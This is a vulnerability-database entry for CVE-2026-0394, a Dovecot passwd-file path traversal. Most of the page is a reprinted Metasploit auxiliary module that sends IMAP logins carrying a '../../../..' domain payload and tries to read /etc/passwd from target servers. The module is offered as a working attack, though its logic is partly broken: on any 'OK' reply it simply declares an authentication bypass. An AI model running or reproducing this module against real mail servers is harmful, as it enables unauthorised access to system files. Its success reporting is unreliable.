📄 Dovecot passwd-file Path Traversal

🗓️ 22 Apr 2026 00:00:00Reported by indoushkaType

Dovecot passwd-file path traversal vulnerability when per-domain passwd files are enabled.

Reporter	Title	Published	Views	Family All 37
ATTACKERKB	CVE-2026-0394	27 Mar 202608:10	–	attackerkb
AlpineLinux	CVE-2026-0394	27 Mar 202608:10	–	alpinelinux
Circl	CVE-2026-0394	27 Mar 202612:13	–	circl
CNNVD	Open-Xchange OX Dovecot Pro 安全漏洞	27 Mar 202600:00	–	cnnvd
CVE	CVE-2026-0394	27 Mar 202608:10	–	cve
Cvelist	CVE-2026-0394	27 Mar 202608:10	–	cvelist
Debian	[SECURITY] [DLA 4556-1] dovecot security update	1 May 202605:11	–	debian
Debian	[SECURITY] [DSA 6197-1] dovecot security update	5 Apr 202615:22	–	debian
Debian	[SECURITY] [DSA 6197-3] dovecot regression update	1 May 202614:34	–	debian
Debian CVE	CVE-2026-0394	27 Mar 202608:10	–	debiancve

==================================================================================================================================
    | # Title     : Dovecot passwd-file Path Traversal Metasploit Module                                                             |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.dovecotpro.com/                                                                                      |
    ==================================================================================================================================
    
    [+] Summary    : This Metasploit auxiliary module targets a path traversal vulnerability in Dovecot’s passwd-file authentication backend when per-domain configuration is enabled.
    
    
    [+] POC        :  
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Auxiliary
      include Msf::Auxiliary::Report
      include Msf::Exploit::Remote::Tcp
      include Msf::Auxiliary::Scanner
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Dovecot passwd-file Path Traversal',
            'Description' => %q{
              Dovecot passwd-file passdb is vulnerable to path traversal when configured to use
              per-domain passwd files.
            },
            'Author' => [
              'indoushka'
            ],
            'References' => [
              ['CVE', '2026-0394'],
              ['URL', 'https://documentation.open-xchange.com/dovecot/security/advisories/html/2026/oxdc-adv-2026-0001.html'],
              ['CWE', '22']
            ],
            'License' => MSF_LICENSE,
            'DisclosureDate' => '2026-03-27'
          )
        )
    
        register_options([
          Opt::RPORT(143),
          OptString.new('TARGET_FILE', [true, 'File to read via path traversal', '/etc/passwd']),
          OptString.new('DOMAIN_PAYLOAD', [true, 'Domain payload with traversal', '../../../..']),
          OptEnum.new('PROTOCOL', [true, 'Protocol', 'IMAP', ['IMAP', 'POP3']])
        ])
      end
    
      def run_host(ip)
        print_status("Dovecot passwd-file Path Traversal (CVE-2026-0394)")
        print_status("Target: #{ip}:#{rport}")
    
        sock = nil
    
        domain = datastore['DOMAIN_PAYLOAD']
        target_file = datastore['TARGET_FILE']
    
        username = "test@#{domain}"
    
        print_status("Attempting to read #{target_file} using domain: #{domain}")
    
        content = read_file_via_auth(username, target_file)
    
        if content && !content.empty?
          print_good("Successfully read #{target_file}")
          print_line(content)
          report_file_content(target_file, content)
        else
          print_error("Failed to read #{target_file}")
        end
      end
    
      def read_file_via_auth(username, target_file)
        sock = nil
    
        begin
          sock = connect
    
          banner = sock.get_once
          vprint_status("Banner: #{banner}")
    
          if datastore['PROTOCOL'] == 'IMAP'
            sock.put("a1 LOGIN \"#{username}\" \"test\"\r\n")
            response = sock.get_once
            vprint_status("Response: #{response}")
    
            if response && response.to_s.include?('OK')
              print_status("Authentication succeeded - file may have been read")
              return "Authentication bypass successful"
            elsif response && response.to_s.include?('NO')
              return response if response.to_s.include?(target_file)
            end
          end
    
        rescue ::Exception => e
          vprint_error("Error: #{e.message}")
        ensure
          disconnect(sock) if sock
        end
    
        nil
      end
    
      def report_file_content(filename, content)
        store_loot(
          'dovecot.path_traversal',
          'text/plain',
          rhost,
          content,
          filename.gsub('/', '_'),
          "File read via path traversal: #{filename}"
        )
      end
    end
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

22 Apr 2026 00:00Current

5.7Medium risk

Vulners AI Score5.7

CVSS 3.15.3

EPSS0.00028

SSVC